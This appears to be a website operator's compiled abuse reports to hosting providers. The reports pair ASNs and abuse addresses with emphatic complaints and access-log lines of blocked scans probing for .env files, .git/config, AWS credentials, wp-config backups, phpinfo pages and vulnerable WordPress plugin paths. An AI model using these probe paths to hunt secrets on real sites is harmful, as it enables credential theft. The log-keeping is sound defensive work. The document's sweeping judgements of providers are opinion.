68.218.118.71 website*x.com – – [19/Jul/2025:06:53:57 +0200] „GET /wp-trackback.php HTTP/1.0“ 302 – „-“ „-“
AS396982 – Google LLC – ALSO GOOGLE AGAIN AND AGAIN! VERY UNSECURE NETWORKS!!!
google-cloud-compliance@google.com
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:34 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:34 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:35 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:35 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:35 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:35 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:35 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:35 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:36 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.com – – [19/Jul/2025:06:59:36 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“

–

MAIL NR. 7 TODAY!

abuse.de@telefonica.com, abuse@virtualine.org,abuse@microsoft.com, msftcs@microsoft.com, azsafety@microsoft.com
AS6805 – Telefonica Germany GmbH & Co.OHG – HERE WITH 3 IP´S! – PENETRANT DAILY TRY TO COPY PICTURES! THERE ARE ALSO PICTURES WITH COPYRIGHT!!!
abuse.de@telefonica.com
176.3.184.45 www.website*x.de – – [19/Jul/2025:03:06:09 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.184.45 www.website*x.de – – [19/Jul/2025:03:06:09 +0200] „GET /wp-content/uploads/2022/05/Icon_xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.184.45 www.website*x.de – – [19/Jul/2025:03:06:09 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.184.45 www.website*x.de – – [19/Jul/2025:03:06:09 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.184.45 www.website*x.de – – [19/Jul/2025:03:06:09 +0200] „GET /wp-content/uploads/2022/01/Icon-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.184.45 www.website*x.de – – [19/Jul/2025:03:06:09 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
+
176.2.10.105 www.website*x.de – – [19/Jul/2025:04:59:42 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.10.105 www.website*x.de – – [19/Jul/2025:04:59:42 +0200] „GET /wp-content/uploads/2022/05/Icon_xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.10.105 www.website*x.de – – [19/Jul/2025:04:59:42 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.10.105 www.website*x.de – – [19/Jul/2025:04:59:42 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.10.105 www.website*x.de – – [19/Jul/2025:04:59:42 +0200] „GET /wp-content/uploads/2022/01/Icon-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.2.10.105 www.website*x.de – – [19/Jul/2025:04:59:42 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
+
176.3.179.8 www.website*x.de – – [19/Jul/2025:09:49:39 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.179.8 www.website*x.de – – [19/Jul/2025:09:49:39 +0200] „GET /wp-content/uploads/2022/05/Icon_xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.179.8 www.website*x.de – – [19/Jul/2025:09:49:39 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.179.8 www.website*x.de – – [19/Jul/2025:09:49:39 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.179.8 www.website*x.de – – [19/Jul/2025:09:49:39 +0200] „GET /wp-content/uploads/2022/01/Icon-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
176.3.179.8 www.website*x.de – – [19/Jul/2025:09:49:39 +0200] „GET /wp-content/uploads/2021/12/cropped-xxx.jpg HTTP/1.0“ 403 – „-“ „MozacFetch/57.0.5“
AS214940 – KPROHOST LLC – VERY IGNORANT PROVIDER – DAILY HACKING-ATTEMPTS – HE DOES NOTHING!!!
abuse@virtualine.org
198.55.98.91 www.website*x.de – – [19/Jul/2025:04:28:01 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36“
AS8075 – Microsoft Corporation IS ALSO COMPLETE BLOCKED, COMPLETE UNWANTED! VERY IGNORANT, VERY UNSECURE!!!
abuse@microsoft.com
172.207.129.169 website*x.de – – [19/Jul/2025:05:56:27 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „-“

–

MAIL NR. 8 TODAY!
google-cloud-compliance@google.com, network-abuse@google.com,ip.abuse@ril.com,ip.management@ril.com,abuse@virtualine.org
AS396982 – Google LLC – GOOGLE AGAIN AND AGAIN! VERY UNSECURE NETWORKS!!!
google-cloud-compliance@google.com
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:45 +0200] „HEAD /wordpress HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:45 +0200] „HEAD / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:45 +0200] „HEAD /wp HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:46 +0200] „HEAD /bc HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:46 +0200] „HEAD /bk HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:46 +0200] „HEAD /backup HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:46 +0200] „HEAD /old HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:46 +0200] „HEAD /new HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:46 +0200] „HEAD /main HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
34.83.32.148 website*x.de – – [19/Jul/2025:06:57:46 +0200] „HEAD /home HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36“
AS55836 – Reliance Jio Infocomm Limited – VERY IGNORAT PROVIDER! – WE HAS SEND SOME ABUSE-MAILS! – THIS NOT A GOOGLE-BOT, THIS IS A HACKER-IDIOT IN YOUR NETWORK!!!
ip.abuse@ril.com
2405:201:a016:c832:8973:56a:f8ed:851d website*x.de – – [19/Jul/2025:07:39:55 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)“
2405:201:a016:c832:8973:56a:f8ed:851d website*x.de – – [19/Jul/2025:07:39:56 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0“
AS214940 – KPROHOST LLC – VERY IGNORANT PROVIDER – DAILY HACKING-ATTEMPTS – HE DOES NOTHING!!!
abuse@virtualine.org
198.55.98.91 website*x.de – – [19/Jul/2025:09:19:51 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux; Android 9; SAMSUNG SM-N950F Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/9.4 Chrome/67.0.3396.87 Mobile Safari/537.36“

–

MAIL NR. 9 TODAY!
abuse@ionos.com,qcloud_net_duty@tencent.com, abuse@ntup.net,abuse@microsoft.com, msftcs@microsoft.com, azsafety@microsoft.com
4 Provider!
AS8560 – IONOS SE – IONOS AGAIN AND AGAIN – STOP THIS NOW!!!
abuse@ionos.com
82.165.88.219 website*x.com – – [19/Jul/2025:09:37:49 +0200] „GET /wp-config.php_old HTTP/1.0“ 403 – „-“ „-“
82.165.88.219 website*x.com – – [19/Jul/2025:09:37:49 +0200] „GET /wp-config.php-old HTTP/1.0“ 403 – „-“ „-“
82.165.88.219 website*x.com – – [19/Jul/2025:09:37:49 +0200] „GET /wp-config.php~ HTTP/1.0“ 403 – „-“ „-“
82.165.88.219 website*x.com – – [19/Jul/2025:09:37:49 +0200] „GET /wp-config.php.backup HTTP/1.0“ 403 – „-“ „-“
AS132203 – Tencent Building, Kejizhongyi Avenue – TENCENT IS COMPLETE BLOCKED, COMPLETE UNWANTED! VERY IGNORANT, VERY UNSECURE!!!
qcloud_net_duty@tencent.com
43.156.172.59 website*x.com – – [19/Jul/2025:11:57:22 +0200] „GET /ss.php?f_c=1 HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Linux; Android 7.0; SM-G892A Build/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Mobile Safari/537.36“
AS48693 – Rices Privately owned enterprise – AGAIN AND AGAIN! NO ANSWER, NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
abuse@ntup.net
194.145.227.125 website*x.com – – [19/Jul/2025:12:07:22 +0200] „GET /wp-content/plugins/wp-business-intelligence-lite/resources/open-flash-chart/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“
AS8075 – Microsoft Corporation – ALSO COMPLETE BLOCKED, COMPLETE UNWANTED! VERY IGNORANT, VERY UNSECURE!!!
abuse@microsoft.com
4.196.96.212 website*x.com – – [19/Jul/2025:12:09:33 +0200] „GET //wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36“

–

MAIL NR. 10 TODAY!
abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de,abuse@myloc.de, abuse@unifique.com.br
AS51167 – Contabo GmbH – CONTABO AGAIN AND AGAIN! NO ANSWER, NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
abuse@contabo.de
167.86.74.247 website*x.com – – [19/Jul/2025:11:28:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [19/Jul/2025:11:28:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://wordpress.org/“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [19/Jul/2025:11:28:35 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Safari/605.1.15“
AS24961 – WIIT AG – NOW ALSO AGAIN AND AGAIN! – STOP THIS HACKER-IDIOTS IN YOUR NETWORKS NOW!!!
abuse@myloc.de
89.163.242.76 website*x.com – – [19/Jul/2025:18:09:29 +0200] „GET /export.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
AS28343 – UNIFIQUE TELECOMUNICACOES S/A – VERY IGNORANT! THERE IST COMING NO ANSWER ABOUT OUR MAILS!!!
abuse@unifique.com.br
2804:30c:1e72:4901:40b2:9f0a:c711:7f3a website*x.com – – [19/Jul/2025:22:22:16 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; x86) AppleWebKit/537.36 (KHTML, like Gecko) Edge/86.0.0.0 Safari/537.36“

–

MAIL NR. 11 TODAY!
abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca,abuse@namecheaphosting.com,abuse@ipxo.com, abuse@contabo.de, noc@contabo.de, sascha.wintz@contabo.de
AS16276 – OVH SAS – OVH AGAIN AND AGAIN! OVH IS ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net
145.239.10.137 website*x.com – – [19/Jul/2025:22:55:03 +0200] „GET /outscout.php HTTP/1.0“ 302 20 „http://website*x.com/outscout.php“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1“
145.239.10.137 website*x.com – – [19/Jul/2025:22:55:03 +0200] „GET /libs.php HTTP/1.0“ 302 20 „http://website*x.com/libs.php“ „Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1“
AS22612 – Namecheap, Inc.
abuse@namecheaphosting.com
199.188.203.83 website*x.com – – [19/Jul/2025:23:18:29 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
199.188.203.83 website*x.com – – [19/Jul/2025:23:18:29 +0200] „GET /core/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
199.188.203.83 website*x.com – – [19/Jul/2025:23:18:29 +0200] „GET /laravel/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64)“
AS51167 – Contabo GmbH – CONTABO AGAIN AND AGAIN! NO ANSWER, NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
abuse@contabo.de
167.86.74.247 website*x.com – – [20/Jul/2025:01:22:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1; rv:120.0) Gecko/20100101 Firefox/120.0“
167.86.74.247 website*x.com – – [20/Jul/2025:01:22:25 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [20/Jul/2025:01:22:25 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“

–

MAIL NR. 12 TODAY!
abuse@ionos.com, abuse@fasthosts.co.uk, abuse@strato.de,abuse@ovh.net, abuse@ovh.us, abuse@ovh.ca
AS8560 – IONOS SE – IONOS AGAIN AND AGAIN! – VERY UNSECURE NETWORKS!
abuse@ionos.com
213.171.211.146 website*x.com – – [20/Jul/2025:06:31:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „https://duckduckgo.com/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0“
213.171.211.146 website*x.com – – [20/Jul/2025:06:31:35 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“
213.171.211.146 website*x.com – – [20/Jul/2025:06:31:35 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36“
AS16276 – OVH SAS – NEXT ONE OVH! – AGAIN AND AGAIN! OVH IS ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@ovh.net,abuse@fasthosts.co.uk
51.89.3.212 website*x.com – – [20/Jul/2025:06:38:40 +0200] „GET /admin.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
51.89.3.212 website*x.com – – [20/Jul/2025:06:38:40 +0200] „GET /about.php?520 HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
AS8560 – IONOS SE – IONOS AGAIN AND AGAIN! – VERY UNSECURE NETWORKS!
abuse@ionos.com,abuse@strato.de
85.215.154.81 website*x.com – – [20/Jul/2025:06:51:32 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
85.215.154.81 website*x.com – – [20/Jul/2025:06:51:46 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

–

MAIL NR. 13 TODAY!
xlluan@bluewave-web.com.cn,klayliang@tencent.com,johnsonqu@tencent.com,abuse@ionos.com,abuse@sriwijayahost.co.id,admin@sriwijayahost.co.id
AS45090 – Shenzhen Tencent Computer Systems Company Limited – DAILY REFERRER-SPAM TO gbnadvisors.com! – NO ANSWER… NOTHING – HE DOES NOTHING ABOUT ABUSE-MAILS FROM US!!!
TENCENT IS ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
xlluan@bluewave-web.com.cn,klayliang@tencent.com
110.40.186.63 www.website*x.com – – [20/Jul/2025:02:58:47 +0200] „GET / HTTP/1.0“ 403 – „http://gbnadvisors.com“ „Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1“
AS8560 – IONOS SE – IONOS AGAIN AND AGAIN! – VERY UNSECURE NETWORKS!
abuse@ionos.com
85.215.154.81 website*x.com – – [20/Jul/2025:04:59:44 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
85.215.154.81 website*x.com – – [20/Jul/2025:04:59:58 +0200] „GET /style.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“
AS58477 – Argon Data Communication
abuse@sriwijayahost.co.id,admin@sriwijayahost.co.id
157.66.56.52 website*x.com – – [20/Jul/2025:05:33:12 +0200] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
157.66.56.52 website*x.com – – [20/Jul/2025:05:33:12 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“

–

MAIL NR. 14 TODAY!
bucklog@proton.me,abuse@mbs763.kz,report@abuseradar.com,abuses@cyberzonehub.com,abuse@aoiot.ru
AS211590 – Bucklog SARL – VERY IGNORANT AND UNSECURE PROVIDER – DAILY THE SAME HACKING-ATTEMPTS! – NO ANSWER… NOTHING – HE DOES NOTHING ABOUT ABUSE-MAILS FROM US!!!
bucklog@proton.me
185.177.72.27 website*x.com – – [20/Jul/2025:02:34:39 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:34:40 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:34:48 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:34:56 +0200] „GET /phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:34:56 +0200] „GET /php_info.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:05 +0200] „GET /test.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:12 +0200] „GET /_profiler/phpinfo HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:13 +0200] „GET /.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:15 +0200] „GET /config/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:16 +0200] „GET /.env.production HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:17 +0200] „GET /.env.local HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:19 +0200] „GET /api/shared/config/config.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:20 +0200] „GET /api/.env HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:21 +0200] „GET / HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:22 +0200] „GET /register/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:24 +0200] „GET /contact/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:25 +0200] „GET /.AWS_/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:27 +0200] „GET /karma.conf.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:28 +0200] „GET /index.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
185.177.72.27 website*x.com – – [20/Jul/2025:02:35:37 +0200] „GET /.aws/credentials HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3“
AS209854 – Cyberzone S.A. – THIS NETWORK IS ALSO COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!
abuse@mbs763.kz
report@abuseradar.com – IGNORE OUR ABUSE-MAILS! – THAT IS NOT SERIOUS!!!
